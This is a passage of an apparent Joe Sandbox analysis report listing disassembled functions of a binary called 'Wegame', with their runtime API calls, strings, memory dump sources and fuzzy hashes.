                                                                Function 00466864 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _To_byte.MSVCP140(?,?), ref: 00466886
                                                                • ?_Xinvalid_argument@std@@YAXPBD@Z.MSVCP140(invalid wchar_t filename argument), ref: 004668B1
                                                                  • Part of subcall function 0043A670: memmove.VCRUNTIME140(?,?,?), ref: 0043A6AC
                                                                Strings
                                                                • invalid wchar_t filename argument, xrefs: 004668AC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: To_byteXinvalid_argument@std@@memmove
                                                                • String ID: invalid wchar_t filename argument
                                                                • API String ID: 1736073181-1601001258
                                                                • Opcode ID: eb973d830c85cc4548a1db69a0e069432ddba1259af81e437627f7d7c465e392
                                                                • Instruction ID: c4f2fc2e7584400560f0ae0828dbdc40163a0d2ce825dc0000f8e7185f3c77bd
                                                                • Opcode Fuzzy Hash: eb973d830c85cc4548a1db69a0e069432ddba1259af81e437627f7d7c465e392
                                                                • Instruction Fuzzy Hash: EBF0A73560011957CF04EB6AD812ADE77EC9F04324F10009AA44197281EEB4EA848759
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046A76E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?is@?$ctype@_W@std@@QBE_NF_W@Z.MSVCP140(000000FF,00000000,?,00465652,00000000,?,00000004,00466499,?,?,00000000,?,?,?,?,?), ref: 0046A781
                                                                • ?is@?$ctype@_W@std@@QBE_NF_W@Z.MSVCP140(00000107,0000005F,?,00465652,00000000,?,00000004,00466499,?,?,00000000,?,?,?,?,?), ref: 0046A79B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?is@?$ctype@_W@std@@
                                                                • String ID: _
                                                                • API String ID: 3980928862-701932520
                                                                • Opcode ID: b63d432dfd4d4ec733e9731186e4383c04324593738bd39df519d59d9a85c1c8
                                                                • Instruction ID: ff0c1fc6cf3615bc641a564b9e3d2a742503710c8a375cab4bd1cdf11c9ed330
                                                                • Opcode Fuzzy Hash: b63d432dfd4d4ec733e9731186e4383c04324593738bd39df519d59d9a85c1c8
                                                                • Instruction Fuzzy Hash: BDE01A38400608BACB149F40D8489A53B71BF10315B14C026FA4D2A2A1E776D9A7DF87
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00442EFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00442F03
                                                                  • Part of subcall function 00441A4F: __EH_prolog3.LIBCMT ref: 00441A56
                                                                  • Part of subcall function 004419BC: __EH_prolog3.LIBCMT ref: 004419C3
                                                                • _CxxThrowException.VCRUNTIME140(?,004966FC,00000000,0000001C,?), ref: 00442F2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID: ~0D
                                                                • API String ID: 2323905274-265891634
                                                                • Opcode ID: b2fc8614671074dfa5ccd843f1044c5e460dc9e2ed787640f45f32eabc22a96a
                                                                • Instruction ID: 7fec55fb4f8aeab86f9935389e29bb249af83b42417121383fbfa14e761700bb
                                                                • Opcode Fuzzy Hash: b2fc8614671074dfa5ccd843f1044c5e460dc9e2ed787640f45f32eabc22a96a
                                                                • Instruction Fuzzy Hash: 25E012B1D0030DA6DF00F6E5CC06ECE767CEB00308F10841BB118A7052DB7D9644876D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0047C201 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID: H$IDownload_mgr
                                                                • API String ID: 431132790-1585110086
                                                                • Opcode ID: b95e77fbb45a0a160c6b111b2eaf5d7b61e7902cff851805749e975b14b84305
                                                                • Instruction ID: 6365d281e75b6003c1685afe2f295f07b79233813a28d6430f47bf2b6d86f694
                                                                • Opcode Fuzzy Hash: b95e77fbb45a0a160c6b111b2eaf5d7b61e7902cff851805749e975b14b84305
                                                                • Instruction Fuzzy Hash: 6AC012156005018E876477A7181778C2541D751739FD0875BF825D71C3DE0C4900025F
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046240D Relevance: 5.0, APIs: 4, Instructions: 46stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(004821C0,?), ref: 00462424
                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(004821C4,?), ref: 00462437
                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(004821C8,?), ref: 0046244A
                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(004821CC,?), ref: 0046245D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: strcmp
                                                                • String ID:
                                                                • API String ID: 1004003707-0
                                                                • Opcode ID: d2a7f35e11463ab55d4c3be82003c461c81b3f0dfcca73dcb63236994c432ba2
                                                                • Instruction ID: 9e073be963b8227a51d3bd8ec7a743c5b55eaa0f74008f5f4be7368270c39741
                                                                • Opcode Fuzzy Hash: d2a7f35e11463ab55d4c3be82003c461c81b3f0dfcca73dcb63236994c432ba2
                                                                • Instruction Fuzzy Hash: 49F0283B204F17754A143EA999029AE3394AB017B8338402BF444410C2FEAAE44586FF
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%